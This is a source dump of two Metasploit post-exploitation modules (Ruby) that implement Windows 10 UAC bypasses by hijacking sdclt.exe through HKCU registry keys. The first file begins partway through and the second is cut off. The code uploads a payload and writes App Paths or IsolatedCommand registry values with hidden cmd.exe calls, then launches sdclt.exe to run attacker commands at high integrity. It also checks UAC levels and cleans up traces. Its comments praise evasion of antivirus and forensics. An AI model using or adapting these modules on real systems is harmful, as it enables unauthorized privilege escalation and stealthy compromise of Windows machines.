87 | require 'msf/core/post/common'
88 | require 'msf/core/post/windows/priv'
89 | require 'msf/core/post/windows/registry'
90 |
91 |
92 |
93 |
94 | #
95 | # Metasploit Class name and includes
96 | #
97 | class MetasploitModule < Msf::Post
98 | Rank = GreatRanking
99 |
100 | include Msf::Post::Common
101 | include Msf::Post::Windows::Priv
102 | include Msf::Post::Windows::Error
103 | include Msf::Post::Windows::Registry
104 |
105 |
106 |
107 |
108 | #
109 | # Building Metasploit/Armitage info GUI/CLI
110 | #
111 | def initialize(info={})
112 | super(update_info(info,
113 | 'Name' => 'Abusing the App Path key for control.exe [sdclt.exe]',
114 | 'Description' => %q{
115 | Implementation of App Path UAC bypass by enigma0x3 and mattifestation. This module will upload your payload.exe, create the required registry entry in the current user’s hive and runs sdclt.exe (hijacking the process being started to gain code execution). NOTE: this technique does not allow for parameters (e.g, C:\Windows\System32\cmd.exe /c calc.exe).
116 | },
117 | 'License' => UNKNOWN_LICENSE,
118 | 'Author' =>
119 | [
120 | 'Module Author : pedr0 Ubuntu [r00t-3xp10it]', # post-module author
121 | 'Vuln discover : enigma0x3 | mattifestation', # POC/vuln credits
122 | 'Special thanks: 0xyg3n [SSA Red Team]', # help debugging
123 | ],
124 |
125 | 'Version' => '$Revision: 1.5',
126 | 'DisclosureDate' => 'abr 26 2017',
127 | 'Platform' => 'windows',
128 | 'Arch' => 'x86_x64',
129 | 'Privileged' => 'false', # thats no need for privilege escalation..
130 | 'Targets' =>
131 | [
132 | [ 'Windows 10' ] # Only works againts Windows 10
133 | ],
134 | 'References' =>
135 | [
136 | [ 'URL', 'https://github.com/r00t-3xp10it' ],
137 | [ 'URL', 'https://github.com/r00t-3xp10it/msf-auxiliarys' ],
138 | [ 'URL', 'https://enigma0x3.net/2017/03/14/bypassing-uac-using-app-paths' ]
139 |
140 |
141 | ],
142 | 'DefaultOptions' =>
143 | {
144 | 'SESSION' => '1', # Default its to run againts session 1
145 | },
146 | 'SessionTypes' => [ 'meterpreter' ]
147 |
148 | ))
149 |
150 | register_options(
151 | [
152 | OptString.new('SESSION', [ true, 'The session number to run this module on']),
153 | OptString.new('PAYLOAD_NAME', [ false, 'The payload NAME to be uploaded (eg shell.exe)']),
154 | OptString.new('DEPLOY_PATH', [ false, 'The destination were to deploy (eg %temp%)']),
155 | OptString.new('LOCAL_PATH', [ false, 'The full path of payload.exe to upload (eg /root/shell.exe)'])
156 | ], self.class)
157 |
158 | register_advanced_options(
159 | [
160 | OptBool.new('CHECK_VULN', [ false, 'Check target vulnerability status?' , false]),
161 | OptBool.new('DEL_REGKEY', [ false, 'Delete the malicious registry key hive?' , false])
162 | ], self.class)
163 |
164 | end
165 |
166 |
167 |
168 |
169 | #
170 | # Gain code execution by hijacking sdclt.exe process
171 | #
172 | def ls_hijack
173 |
174 | r=''
175 | session = client
176 | hija_soft = "sdclt.exe"
177 | upl_path = datastore['LOCAL_PATH'] # /root/payload.exe
178 | dep_path = datastore['DEPLOY_PATH'] # %temp%
179 | pay_name = datastore['PAYLOAD_NAME'] # payload.exe
180 | uac_level = "ConsentPromptBehaviorAdmin" # uac level registry key
181 | uac_hivek = "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System" # uac hive key
182 | regi_hive = "HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\App Paths\\control.exe" # registry hive key to be hijacked
183 | #
184 | # check for proper config settings enter
185 | # to prevent 'unset all' from deleting default options ..
186 | #
187 | if datastore['DEPLOY_PATH'] == 'nil' || datastore['LOCAL_PATH'] == 'nil' || datastore['PAYLOAD_NAME'] == 'nil'
188 | print_error("Options not configurated correctly ..")
189 | print_warning("Please set DEPLOY_PATH | LOCAL_PATH | PAYLOAD_NAME options!")
190 | return nil
191 | else
192 | print_status("Hijacking #{hija_soft} process!")
193 | Rex::sleep(1.5)
194 | end
195 |
196 | #
197 | # Search in target regedit if hijack hive exists ..
198 | #
199 | print_warning("Reading process registry hive keys ..")
200 | Rex::sleep(1.0)
201 | if registry_enumkeys("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion")
202 | print_good(" exec => remote registry hive key found!")
203 | Rex::sleep(1.0)
204 | else
205 | # registry hive key not found, aborting module execution ..
206 | print_warning("Hive key: HKCU\\Software\\Microsoft\\Windows\\CurrentVersion")
207 | print_error("[ABORT]: module cant find the registry hive key needed ..")
208 | print_error("System does not appear to be vulnerable to the exploit code!")
209 | print_line("")
210 | Rex::sleep(1.0)
211 | return nil
212 | end
213 |
214 | #
215 | # Check target UAC settings (always notify - will abort module execution)
216 | #
217 | check_success = registry_getvaldata("#{uac_hivek}","#{uac_level}")
218 | # a dword:2 value it means 'always notify' setting is active.
219 | if check_success == 2
220 | print_warning("Target UAC set to: #{check_success} (always notify)")
221 | print_error("[ABORT]: module can not work under this condictions ..")
222 | print_error("Remote system its not vulnerable to the exploit code!")
223 | print_line("")
224 | Rex::sleep(1.0)
225 | return nil
226 | # a dword:nil value it means that we are running againts a 'non-uac-system'
227 | elsif check_success.nil?
228 | print_warning("UAC DWORD DATA EMPTY (NON-UAC-SYSTEM?)")
229 | print_error("[ABORT]: module can not work under this condictions ..")
230 | print_error("Remote system its not vulnerable to the exploit code!")
231 | print_line("")
232 | Rex::sleep(1.0)
233 | return nil
234 | else
235 | # all good in UAC settings :D
236 | print_good(" exec => Target UAC set to: #{check_success} (exploitable)")
237 | Rex::sleep(1.0)
238 | end
239 |
240 | #
241 | # Upload our executable into target system ..
242 | # And config registry key injection (hijack) ..
243 | #
244 | print_good(" exec => Uploading: #{pay_name} agent ..")
245 | client.fs.file.upload("#{dep_path}\\#{pay_name}","#{upl_path}")
246 | sleep(1.0)
247 | comm_inje = "\"#{regi_hive}\" /ve /t REG_SZ /d \"#{dep_path}\\#{pay_name}\" /f"
248 | print_good(" exec => Placing hijack registry key ..")
249 | Rex::sleep(1.0)
250 | #
251 | # Execute process hijacking in registry ..
252 | # REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\App Paths\control.exe" /ve /t REG_SZ /d "%temp%\\payload.exe" /f
253 | #
254 | print_good(" exec => Hijacking process to gain code execution ..")
255 | r = session.sys.process.execute("cmd.exe /c REG ADD #{comm_inje}", nil, {'Hidden' => true, 'Channelized' => true})
256 | # give a proper time to refresh regedit 'enigma0x3' :D
257 | Rex::sleep(4.5)
258 |
259 | #
260 | # Start remote service to gain code execution ..
261 | #
262 | print_good(" exec => Starting sdclt.exe native process ..")
263 | r = session.sys.process.execute("cmd.exe /c start #{hija_soft}", nil, {'Hidden' => true, 'Channelized' => true})
264 | Rex::sleep(0.5)
265 |
266 | # close channel when done
267 | print_status("UAC-RCE Credits: enigma0x3 + @mattifestation")
268 | print_line("")
269 | r.channel.close
270 | r.close
271 |
272 | # error exception funtion
273 | rescue ::Exception => e
274 | print_error("Error: #{e.class} #{e}")
275 | end
276 |
277 |
278 |
279 |
280 | #
281 | # This funtion returns control.exe reg key to is default value ..
282 | #
283 | def ls_clean
284 |
285 | r=''
286 | session = client
287 | reg_clean = "HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\App Paths" # registry hive to be cleaned ..
288 | #
289 | # check for proper config settings enter
290 | # to prevent 'unset all' from deleting default options ..
291 | #
292 | if datastore['DEL_REGKEY'] == 'nil'
293 | print_error("Options not configurated correctly ..")
294 | print_warning("Please set DEL_REGKEY option!")
295 | return nil
296 | else
297 | print_status("Revert sdclt.exe process hijack!")
298 | Rex::sleep(1.5)
299 | end
300 |
301 | #
302 | # Search in target regedit if hijack hive key exists ..
303 | #
304 | print_warning("Reading process registry hive keys ..")
305 | Rex::sleep(1.0)
306 | if registry_enumkeys("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\App Paths\\control.exe")
307 | print_good(" exec => Remote registry hive key found!")
308 | Rex::sleep(1.0)
309 | else
310 | # Registry hive key not found, aborting module execution.
311 | print_warning("Hive key: HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\App Paths\\control.exe")
312 | print_error("[ABORT]: module cant find the registry hive key needed ..")
313 | print_line("")
314 | Rex::sleep(1.0)
315 | return nil
316 | end
317 |
318 | #
319 | # Revert hijacking registry key from target regedit ..
320 | #
321 | print_good(" exec => Reverting control.exe hijack reg key ..")
322 | r = session.sys.process.execute("cmd.exe /c REG DELETE \"#{reg_clean}\" /f", nil, {'Hidden' => true, 'Channelized' => true})
323 | print_good(" exec => REG DELETE \"#{reg_clean}\" /f")
324 | # give a proper time to refresh regedit
325 | Rex::sleep(3.0)
326 |
327 | # close channel when done
328 | print_status("process hijack reverted to default stage!")
329 | print_line("")
330 | r.channel.close
331 | r.close
332 |
333 | # error exception funtion
334 | rescue ::Exception => e
335 | print_error("Error: #{e.class} #{e}")
336 | end
337 |
338 |
339 |
340 |
341 | #
342 | # Check for target vulnerability status/existence
343 | #
344 | def ls_vulncheck
345 |
346 | r=''
347 | session = client
348 | hija_soft = "sdclt.exe"
349 | sys_build = session.sys.config.sysinfo
350 | oscheck = client.fs.file.expand_path("%OS%")
351 | uac_level = "ConsentPromptBehaviorAdmin" # uac level key
352 | uac_hivek = "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System" # uac hive key
353 | #
354 | # check for proper config settings enter
355 | # to prevent 'unset all' from deleting default options ..
356 | #
357 | if datastore['CHECK_VULN'] == 'nil'
358 | print_error("Options not configurated correctly ..")
359 | print_warning("Please set CHECK_VULN option!")
360 | return nil
361 | else
362 | print_status("Checking target vulnerability details!")
363 | Rex::sleep(1.5)
364 | end
365 |
366 | #
367 | # Check for target registry hive/key existence ..
368 | #
369 | print_warning("Reading process registry hive keys ..")
370 | Rex::sleep(2.0)
371 | if registry_enumkeys("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\App Paths\\control.exe")
372 | vuln_stats = "HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\App Paths\\control.exe"
373 | report_tw = "VULNERABLE (hijack reg key found)"
374 | elsif registry_enumkeys("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\App Paths")
375 | vuln_stats = "HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\App Paths"
376 | report_tw = "POSSIBLE VULNERABLE (hive 'App Paths' found)"
377 | elsif registry_enumkeys("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion")
378 | vuln_stats = "HKCU\\Software\\Microsoft\\Windows\\CurrentVersion"
379 | report_tw = "POSSIBLE VULNERABLE (hive 'CurrentVersion' found)"
380 | else
381 | vuln_stats = "HKCU\\Software\\Microsoft\\Windows\\CurrentVersion"
382 | report_tw = "NOT VULNERABLE (hive not found)"
383 | end
384 |
385 | #
386 | # check target registry hive/key settings (UAC level settings)
387 | #
388 | check_uac = registry_getvaldata("#{uac_hivek}","#{uac_level}")
389 | # a dword:2 value it means 'always notify' setting is active.
390 | if check_uac == 2
391 | report_level = "ALWAYS NOTIFY (NOT EXPLOITABLE)"
392 | # a dword:nil value it means that we are running againts a 'non-uac-system'
393 | elsif check_uac.nil?
394 | report_level = "DWORD DATA EMPTY (NON-UAC-SYSTEM?)"
395 | else
396 | # all good in UAC settings :D
397 | report_level = "#{check_uac} (EXPLOITABLE)"
398 | end
399 |
400 | #
401 | # Checks for target OS compatiblity.
402 | #
403 | if oscheck.nil?
404 | oscheck = "NOT COMPATIBLE SYSTEM"
405 | end
406 |
407 | #
408 | # Display target registry settings to user ..
409 | # I hope you are smart enouth to recognise a vulnerable output :D
410 | #
411 | print_line("")
412 | print_line("VULNERABLE_SOFT : #{hija_soft}")
413 | print_line(" TARGET_OS : #{oscheck}")
414 | print_line(" OS BUILD : #{sys_build['Computer']}")
415 | print_line(" UAC_LEVEL : #{report_level}")
416 | print_line("")
417 | print_line(" HIJACK_HIVE : #{vuln_stats}")
418 | print_line(" VULN_STATUS : #{report_tw}")
419 | print_line("")
420 | Rex::sleep(1.0)
421 | end
422 |
423 |
424 |
425 |
426 | #
427 | # MAIN DISPLAY WINDOWS (ALL MODULES - def run)
428 | # Running sellected modules against session target
429 | #
430 | def run
431 | session = client
432 |
433 | # Variable declarations (msf API calls)
434 | oscheck = client.fs.file.expand_path("%OS%")
435 | sysnfo = session.sys.config.sysinfo
436 | runtor = client.sys.config.getuid
437 | runsession = client.session_host
438 | directory = client.fs.dir.pwd
439 |
440 |
441 | # Print banner and scan results on screen
442 | print_line(" +----------------------------------------------+")
443 | print_line(" | enigma fileless UAC bypass 'control.exe' |")
444 | print_line(" | Author : r00t-3xp10it |")
445 | print_line(" +----------------------------------------------+")
446 | print_line("")
447 | print_line(" Running on session : #{datastore['SESSION']}")
448 | print_line(" Computer : #{sysnfo['Computer']}")
449 | print_line(" Operative System : #{sysnfo['OS']}")
450 | print_line(" Target IP addr : #{runsession}")
451 | print_line(" Payload directory : #{directory}")
452 | print_line(" Client UID : #{runtor}")
453 | print_line("")
454 | print_line("")
455 |
456 |
457 | #
458 | # the 'def check()' funtion that rapid7 requires to accept new modules.
459 | # Guidelines for Accepting Modules and Enhancements:https://goo.gl/OQ6HEE
460 | #
461 | # check for proper operating system (windows-not-wine)
462 | if not oscheck == "Windows_NT"
463 | print_error("[ ABORT ]: This module only works againts windows systems")
464 | return nil
465 | end
466 | #
467 | # check for proper operating system (windows 10)
468 | #
469 | if not sysinfo['OS'] =~ /Windows 10/
470 | print_error("[ ABORT ]: This module only works againt windows 10 systems")
471 | return nil
472 | end
473 | #
474 | # check for correct version build
475 | #
476 | if not sysinfo['OS'] =~ /(Build 15031)/
477 | print_error("[ ABORT ]: This module only works againt Build 15031")
478 | return nil
479 | end
480 | #
481 | # check for proper session (meterpreter) the non-return of sysinfo
482 | # command reveals that we are not on a meterpreter session ..
483 | #
484 | if not sysinfo.nil?
485 | print_status("Running module against: #{sysnfo['Computer']}")
486 | else
487 | print_error("[ ABORT ]: This module only works in meterpreter sessions!")
488 | return nil
489 | end
490 | # elevate session privileges befor runing options
491 | client.sys.config.getprivs.each do |priv|
492 | end
493 |
494 |
495 |
496 | #
497 | # Selected settings to run
498 | #
499 | if datastore['DEPLOY_PATH']
500 | ls_hijack
501 | end
502 |
503 | if datastore['DEL_REGKEY']
504 | ls_clean
505 | end
506 |
507 | if datastore['CHECK_VULN']
508 | ls_vulncheck
509 | end
510 | end
511 | end
512 |
--------------------------------------------------------------------------------
/windows/local-privilege-escalation/enigma_fileless_IsolatedCommand.rb:
--------------------------------------------------------------------------------
1 | ##
2 | # This file is part of the Metasploit Framework and may be subject to
3 | # redistribution and commercial restrictions. Please see the Metasploit
4 | # Framework web site for more information on licensing and terms of use.
5 | # http://metasploit.com/framework/
6 | ##
7 |
8 |
9 | ##
10 | # Exploit Title : enigma_fileless_IsolatedCommand.rb
11 | # Module Author : pedr0 Ubuntu [r00t-3xp10it]
12 | # Vuln discover : enigma0x3 | @mattifestation
13 | # Only works againt: Windows 10
14 | # POC: https://enigma0x3.net/2017/03/17/fileless-uac-bypass-using-sdclt-exe/
15 | #
16 | #
17 | #
18 | # [ DESCRIPTION ]
19 | # Most of the UAC bypass techniques require dropping a file to disk (for example, placing a DLL on disk
20 | # to perform a DLL hijack). The technique used in this module differs from the other public methods and
21 | # provides a useful new technique that does not rely on a privileged file copy, code injection, or placing
22 | # a traditional file on disk.
23 | #
24 | # As a normal user, you have write access to keys in HKCU, if an elevated process interacts with keys you
25 | # are able to manipulate, you can potentially interfere with actions a high-integrity process is attempting
26 | # to perform (hijack the process being started). Due to the fact that I was able to hijack the process, it
27 | # is possible to simply execute whatever malicious cmd.exe command you wish. This means that code execution
28 | # has been achieved in a high integrity process (bypassing UAC) without dropping a DLL or other file down to
29 | # the file system. This significantly reduces the risk to the attacker because they aren’t placing a traditional
30 | # file on the file system that can be caught by AV/HIPS or forensically identified later.
31 | # "This module will not work if target UAC level its set to 'Always Notify'"
32 | #
33 | #
34 | #
35 | # [ MODULE OPTIONS ]
36 | # The session number to run this module on => set SESSION 3
37 | # The cmd.exe command to be executed (target) => set EXEC_COMMAND start firefox.exe www.househot.com
38 | # Check target vulnerability settings/status? => set CHECK_VULN true
39 | # Delete malicious registry hive keys/values? => set DEL_REGKEY true
40 | # Use powershell.exe to execute our command? => set USE_POWERSHELL true
41 | #
42 | #
43 | #
44 | # [ PORT MODULE TO METASPLOIT DATABASE ]
45 | # Kali linux COPY TO: /usr/share/metasploit-framework/modules/post/windows/escalate/enigma_fileless_IsolatedCommand.rb
46 | # Ubuntu linux COPY TO: /opt/metasploit/apps/pro/msf3/modules/post/windows/escalate/enigma_fileless_IsolatedCommand.rb
47 | # Manually Path Search: root@kali:~# locate modules/post/windows/escalate
48 | #
49 | #
50 | # [ LOAD/USE AUXILIARY ]
51 | # meterpreter > background
52 | # msf exploit(handler) > reload_all
53 | # msf exploit(handler) > use post/windows/escalate/enigma_fileless_IsolatedCommand
54 | # msf post(enigma_fileless_IsolatedCommand) > info
55 | # msf post(enigma_fileless_IsolatedCommand) > show options
56 | # msf post(enigma_fileless_IsolatedCommand) > show advanced options
57 | # msf post(enigma_fileless_IsolatedCommand) > set [option(s)]
58 | # msf post(enigma_fileless_IsolatedCommand) > exploit
59 | #
60 | # [ HINT ]
61 | # In some linux distributions postgresql needs to be started and
62 | # metasploit database deleted/rebuild to be abble to load module.
63 | # 1 - service postgresql start
64 | # 2 - msfdb reinit (optional)
65 | # 3 - msfconsole -x 'reload_all'
66 | ##
67 |
68 |
69 |
70 |
71 | # ----------------------------
72 | # Module Dependencies/requires
73 | # ----------------------------
74 | require 'rex'
75 | require 'msf/core'
76 | require 'msf/core/post/common'
77 | require 'msf/core/post/windows/priv'
78 | require 'msf/core/post/windows/registry'
79 |
80 |
81 |
82 |
83 | # ----------------------------------
84 | # Metasploit Class name and includes
85 | # ----------------------------------
86 | class MetasploitModule < Msf::Post
87 | Rank = GreatRanking
88 |
89 | include Msf::Post::Common
90 | include Msf::Post::Windows::Priv
91 | include Msf::Post::Windows::Error
92 | include Msf::Post::Windows::Registry
93 |
94 |
95 |
96 |
97 | # -----------------------------------------
98 | # Building Metasploit/Armitage info GUI/CLI
99 | # -----------------------------------------
100 | def initialize(info={})
101 | super(update_info(info,
102 | 'Name' => 'enigma fileless uac bypass [sdclt.exe]',
103 | 'Description' => %q{
104 | Implementation of fileless uac bypass by enigma and mattifestation using cmd.exe or powershell.exe This module will create the required registry entry in the current user’s hive, set the reg_sz value to whatever you pass via the EXEC_COMMAND parameter, and runs sdclt.exe (hijacking the process being started to gain code execution).
105 | },
106 | 'License' => UNKNOWN_LICENSE,
107 | 'Author' =>
108 | [
109 | 'Module Author: pedr0 Ubuntu [r00t-3xp10it]', # post-module author
110 | 'Vuln discover: enigma0x3 | mattifestation', # vulnerability credits
111 | ],
112 |
113 | 'Version' => '$Revision: 1.5',
114 | 'DisclosureDate' => 'mar 18 2017',
115 | 'Platform' => 'windows',
116 | 'Arch' => 'x86_x64',
117 | 'Privileged' => 'false', # thats no need for privilege escalation..
118 | 'Targets' =>
119 | [
120 | [ 'Windows 10' ] # Only works againts Windows 10
121 | ],
122 | 'References' =>
123 | [
124 | [ 'URL', 'https://github.com/r00t-3xp10it' ],
125 | [ 'URL', 'https://github.com/r00t-3xp10it/msf-auxiliarys' ],
126 | [ 'URL', 'https://enigma0x3.net/2017/03/17/fileless-uac-bypass-using-sdclt-exe' ]
127 |
128 |
129 | ],
130 | 'DefaultOptions' =>
131 | {
132 | 'SESSION' => '1', # Default its to run againts session 1
133 | },
134 | 'SessionTypes' => [ 'meterpreter' ]
135 |
136 | ))
137 |
138 | register_options(
139 | [
140 | OptString.new('SESSION', [ true, 'The session number to run this module on']),
141 | OptString.new('EXEC_COMMAND', [ false, 'The command to be executed (eg start notepad.exe)']),
142 | OptBool.new('CHECK_VULN', [ false, 'Check target vulnerability details/status?' , false])
143 | ], self.class)
144 |
145 | register_advanced_options(
146 | [
147 | OptBool.new('USE_POWERSHELL', [ false, 'Use powershell -Command to execute our command?' , false]),
148 | OptBool.new('DEL_REGKEY', [ false, 'Delete the malicious registry hive/keys?' , false])
149 | ], self.class)
150 |
151 | end
152 |
153 |
154 |
155 |
156 | # ----------------------------------------------
157 | # GAIN REMOTE CODE EXCUTION BY HIJACKING PROCESS
158 | # ----------------------------------------------
159 | def ls_stage1
160 |
161 | session = client
162 | # arch = client.fs.file.expand_path("%ComSpec%")
163 | arch_check = client.fs.file.expand_path("%Windir%\\SysWOW64")
164 | if arch_check == "C:\\Windows\\SysWOW64"
165 | arch = "SysWOW64"
166 | else
167 | arch = "System32"
168 | end
169 |
170 | r=''
171 | vul_serve = "sdclt.exe" # vulnerable soft to be hijacked
172 | exec_comm = datastore['EXEC_COMMAND'] # my cmd command to execute (OR powershell)
173 | uac_level = "ConsentPromptBehaviorAdmin" # uac level registry key
174 | vul_value = "IsolatedCommand" # vulnerable registry value to create
175 | comm_path = "%SystemRoot%\\#{arch}\\cmd.exe /c" # cmd.exe %comspec% path
176 | regi_hive = "REG ADD HKCU\\Software\\Classes\\exefile\\shell\\runas\\command" # registry hive key to be hijacked
177 | psh_comma = "%SystemRoot%\\#{arch}\\WindowsPowershell\\v1.0\\powershell.exe -Command" # use_powershell advanced option command
178 | uac_hivek = "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System" # uac hive key
179 | # check for proper config settings enter
180 | # to prevent 'unset all' from deleting default options ..
181 | if datastore['EXEC_COMMAND'] == 'nil'
182 | print_error("Options not configurated correctly ..")
183 | print_warning("Please set EXEC_COMMAND option!")
184 | return nil
185 | else
186 | print_status("Hijacking #{vul_serve} process!")
187 | Rex::sleep(1.5)
188 | end
189 |
190 | # search in target regedit if binary calls runas
191 | print_warning("Reading process registry hive keys ..")
192 | Rex::sleep(1.0)
193 | if registry_enumkeys("HKCU\\Software\\Classes")
194 | print_good(" exec => remote registry hive key found!")
195 | Rex::sleep(1.0)
196 | else
197 | # registry hive key not found, aborting module execution.
198 | print_warning("Hive key: HKCU\\Software\\Classes\\exefile (runas call)")
199 | print_error("[ABORT]: module cant find the registry hive key needed ..")
200 | print_error("System does not appear to be vulnerable to the exploit code!")
201 | print_line("")
202 | Rex::sleep(1.0)
203 | return nil
204 | end
205 |
206 | # check target UAC settings (always notify - will abort module execution)
207 | check_success = registry_getvaldata("#{uac_hivek}","#{uac_level}")
208 | # a dword:2 value it means 'always notify' setting is active.
209 | if check_success == 2
210 | print_warning("Target UAC set to: #{check_success} (always notify)")
211 | print_error("[ABORT]: module can not work under this condictions ..")
212 | print_error("Remote system its not vulnerable to the exploit code!")
213 | print_line("")
214 | Rex::sleep(1.0)
215 | return nil
216 | # a dword:nil value it means that we are running againts a 'non-uac-system'
217 | elsif check_success.nil?
218 | print_warning("UAC DWORD DATA EMPTY (NON-UAC-SYSTEM?)")
219 | print_error("[ABORT]: module can not work under this condictions ..")
220 | print_error("Remote system its not vulnerable to the exploit code!")
221 | print_line("")
222 | Rex::sleep(1.0)
223 | return nil
224 | else
225 | # all good in UAC settings :D
226 | print_good(" exec => Target UAC set to: #{check_success} (exploitable)")
227 | Rex::sleep(1.0)
228 | end
229 |
230 | #
231 | # chose to execute a single command in cmd.exe syntax
232 | # or to execute command using powershell.exe syntax
233 | #
234 | if datastore['USE_POWERSHELL'] == true
235 | comm_inje = "#{regi_hive} /v #{vul_value} /t REG_SZ /d \"#{psh_comma} #{exec_comm}\" /f"
236 | print_good(" exec => Creating registry powershell command data")
237 | print_good(" data: #{psh_comma} #{exec_comm}")
238 | Rex::sleep(1.0)
239 | else
240 | comm_inje = "#{regi_hive} /v #{vul_value} /t REG_SZ /d \"#{comm_path} #{exec_comm}\" /f"
241 | print_good(" exec => Creating registry cmd command data")
242 | print_good(" data: #{comm_path} #{exec_comm}")
243 | Rex::sleep(1.0)
244 | end
245 |
246 | # Execute process hijacking in registry (cmd.exe OR powershell.exe) ..
247 | # REG ADD HKCU\Software\Classes\mscfile\shell\open\command /v IsolatedCommand /t REG_SZ /d "powershell.exe -Command start notepad.exe" /f
248 | # REG ADD HKCU\Software\Classes\mscfile\shell\open\command /v IsolatedCommand /t REG_SZ /d "cmd.exe /c start notepad.exe" /f
249 | print_good(" exec => Hijacking process to gain code execution ..")
250 | r = session.sys.process.execute("cmd.exe /c #{comm_inje}", nil, {'Hidden' => true, 'Channelized' => true})
251 | # give a proper time to refresh regedit 'enigma0x3' :D
252 | Rex::sleep(4.0)
253 |
254 | # start remote service to gain code execution
255 | print_good(" exec => Starting #{vul_serve} native process ..")
256 | r = session.sys.process.execute("cmd.exe /c start #{vul_serve} /KickOffElev", nil, {'Hidden' => true, 'Channelized' => true})
257 | Rex::sleep(1.0)
258 |
259 | # close channel when done
260 | print_status("UAC-RCE Credits: enigma0x3 + @mattifestation")
261 | print_line("")
262 | r.channel.close
263 | r.close
264 |
265 | # error exception funtion
266 | rescue ::Exception => e
267 | print_error("Error: #{e.class} #{e}")
268 | end
269 |
270 |
271 |
272 |
273 | # ----------------------------------------------------
274 | # DELETE MALICIOUS REGISTRY ENTRY (process hijacking)
275 | # ----------------------------------------------------
276 | def ls_stage2
277 |
278 | r=''
279 | session = client
280 | vul_serve = "sdclt.exe" # vulnerable soft to be hijacked
281 | vul_value = "IsolatedCommand" # vulnerable reg value to create
282 | chec_hive = "HKCU\\Software\\Classes\\exefile\\shell\\runas\\command" # registry hive key to be hijacked
283 | reg_clean = "REG DELETE HKCU\\Software\\Classes\\exefile /f" # registry hive to be clean
284 | # check for proper config settings enter
285 | # to prevent 'unset all' from deleting default options ..
286 | if datastore['DEL_REGKEY'] == 'nil'
287 | print_error("Options not configurated correctly ..")
288 | print_warning("Please set DEL_REGKEY option!")
289 | return nil
290 | else
291 | print_status("Revert #{vul_serve} process hijack!")
292 | Rex::sleep(1.5)
293 | end
294 |
295 | # search in target regedit if hijacking method allready exists
296 | print_warning("Reading process registry hive keys ..")
297 | Rex::sleep(1.0)
298 | if registry_getvaldata("#{chec_hive}","#{vul_value}")
299 | print_good(" exec => Remote registry hive key found!")
300 | Rex::sleep(1.0)
301 | else
302 | # registry hive key not found, aborting module execution.
303 | print_warning("Hive key: HKCU\\Software\\Classes\\exefile\\shell\\runas\\command IsolatedCommand")
304 | print_error("[ABORT]: module cant find the registry hive key needed ..")
305 | print_line("")
306 | Rex::sleep(1.0)
307 | return nil
308 | end
309 |
310 | # Delete hijacking hive keys from target regedit ..
311 | # REG DELETE HKCU\Software\Classes\exefile /f
312 | print_good(" exec => Deleting HKCU hive registry keys ..")
313 | print_good(" exec => cmd.exe /c #{reg_clean}")
314 | r = session.sys.process.execute("cmd.exe /c #{reg_clean}", nil, {'Hidden' => true, 'Channelized' => true})
315 | # give a proper time to refresh regedit
316 | Rex::sleep(3.0)
317 |
318 | # check if remote registry hijack key was deleted successefuly
319 | if registry_getvaldata("#{chec_hive}","#{vul_value}")
320 | print_warning("Module can not verify if deletion has successefully!")
321 | else
322 | print_status("Registry hive keys deleted successefuly!")
323 | end
324 |
325 | Rex::sleep(1.0)
326 | # close channel when done
327 | print_status("process hijack reverted to default stage!")
328 | print_line("")
329 | r.channel.close
330 | r.close
331 |
332 | # error exception funtion
333 | rescue ::Exception => e
334 | print_error("Error: #{e.class} #{e}")
335 | end
336 |
337 |
338 |
339 |
340 | # -------------------------------------------
341 | # CHECK TARGET VULNERABILITY STATUS/EXISTANCE
342 | # -------------------------------------------
343 | def ls_stage3
344 |
345 | r=''
346 | session = client
347 | oscheck = client.fs.file.expand_path("%OS%")
348 | vuln_soft = "sdclt.exe" # vulnerable soft to be hijacked
349 | uac_level = "ConsentPromptBehaviorAdmin" # uac level key
350 | vul_value = "IsolatedCommand" # vulnerable reg value to create
351 | vuln_key = "HKCU\\Software\\Classes\\exefile\\shell\\runas\\command" # vuln hijack key
352 | uac_hivek = "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System" # uac hive key
353 | # check for proper config settings enter
354 | # to prevent 'unset all' from deleting default options ..
355 | if datastore['CHECK_VULN'] == 'nil'
356 | print_error("Options not configurated correctly ..")
357 | print_warning("Please set CHECK_VULN option!")
358 | return nil
359 | else
360 | print_status("Checking target vulnerability details!")
361 | Rex::sleep(1.5)
362 | end
363 |
364 | print_warning("Reading process registry hive keys ..")
365 | Rex::sleep(2.0)
366 | # check target registry hive/key settings (hijacking hive/key)
367 | if registry_getvaldata("#{vuln_key}","#{vul_value}")
368 | vuln_stats = "#{vuln_key}"
369 | report_tw = "UAC BYPASS ACTIVE (runas)"
370 | elsif registry_enumkeys("HKCU\\Software\\Classes")
371 | vul_value = "NOT FOUND"
372 | vuln_stats = "HKCU\\Software\\Classes"
373 | report_tw = "VULNERABLE (hive found)"
374 | else
375 | vul_value = "NOT FOUND"
376 | vuln_stats = "HKCU\\Software\\Classes"
377 | report_tw = "NOT VULNERABLE (hive not found)"
378 | end
379 |
380 | # check target registry hive/key settings (UAC level settings)
381 | check_uac = registry_getvaldata("#{uac_hivek}","#{uac_level}")
382 | # a dword:2 value it means 'always notify' setting is active.
383 | if check_uac == 2
384 | report_level = "ALWAYS NOTIFY (NOT EXPLOITABLE)"
385 | # a dword:nil value it means that we are running againts a 'non-uac-system'
386 | elsif check_uac.nil?
387 | report_level = "DWORD DATA EMPTY (NON-UAC-SYSTEM?)"
388 | else
389 | # all good in UAC settings :D
390 | report_level = "#{check_uac} (EXPLOITABLE)"
391 | end
392 |
393 | # obsolect 'def run' allready checks for OS compatiblity.
394 | if oscheck.nil?
395 | oscheck = "NOT COMPATIBLE SYSTEM"
396 | end
397 |
398 | print_line("")
399 | # display target registry settings to user ..
400 | # i hope you are smart enouth to recognise a vulnerable output :D
401 | print_line("VULNERABLE_SOFT : #{vuln_soft}")
402 | print_line(" TARGET_OS : #{oscheck}")
